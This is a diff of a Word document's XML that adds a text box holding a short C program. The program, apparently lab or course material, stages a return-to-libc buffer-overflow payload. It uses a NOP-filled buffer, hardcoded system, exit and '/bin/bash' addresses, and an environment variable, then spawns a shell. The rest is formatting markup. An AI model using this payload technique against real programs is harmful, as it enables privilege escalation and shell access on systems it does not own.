+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Textfeld 23" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:12.4pt;width:333pt;height:377.75pt;z-index:251675648;visibility:visible;mso-wrap-style:square;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-height-percent:0;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>stdio.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>stdlib.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>string.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>systemAddr</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[] = "\x60\xe5\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xea</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>\xb7";</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>exitAddr</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[] = "\x50\x3b\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xea</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>\xb7";</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>bashAddr</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[] = "\x50\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xfd</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xff</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>\</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>xbf</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>";</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>main</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>()</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>{</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>buffer</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[104];</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>memset</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>buffer</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, 0x90, 104);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>memcpy</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>buffer</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, "BUF=", 4);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>memcpy</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">(buffer+88, </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>systemAddr</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, 4);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>memcpy</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">(buffer+92, </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>exitAddr</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, 4);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>memcpy</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">(buffer+96, </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>bashAddr</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>, 4);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>memcpy</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(buffer+100, "\x00\x00\x00\x00", 4);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>putenv</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>buffer</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>system</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>("/bin/</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>bash</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>return</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> 1;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>}</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1134" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
@@ -6773,7 +13948,7 @@
       <w:rPr>
         <w:noProof/>
       </w:rPr>
-      <w:t>15.10.2012</w:t>
+      <w:t>29.10.2012</w:t>
     </w:r>
     <w:r>
       <w:fldChar w:fldCharType="end"/>
@@ -6785,9 +13960,9 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:abstractNum w:abstractNumId="0">
-    <w:nsid w:val="2B0F192C"/>
+    <w:nsid w:val="0FD76365"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="6F08FDDA"/>
+    <w:tmpl w:val="EBA83D9C"/>
     <w:lvl w:ilvl="0" w:tplc="04070001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -6898,9 +14073,122 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1">
-    <w:nsid w:val="2D664CD0"/>
+    <w:nsid w:val="16D174FF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="EE8E6954"/>
+    <w:tmpl w:val="3C1C5EF0"/>
+    <w:lvl w:ilvl="0" w:tplc="04070001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2">
+    <w:nsid w:val="2B0F192C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6F08FDDA"/>
     <w:lvl w:ilvl="0" w:tplc="04070001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -7010,7 +14298,233 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2">
+  <w:abstractNum w:abstractNumId="3">
+    <w:nsid w:val="2D664CD0"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="EE8E6954"/>
+    <w:lvl w:ilvl="0" w:tplc="04070001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04070003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4">
+    <w:nsid w:val="30E913E1"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="B0321610"/>
+    <w:lvl w:ilvl="0" w:tplc="04070001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04070003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04070005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04070001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04070003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
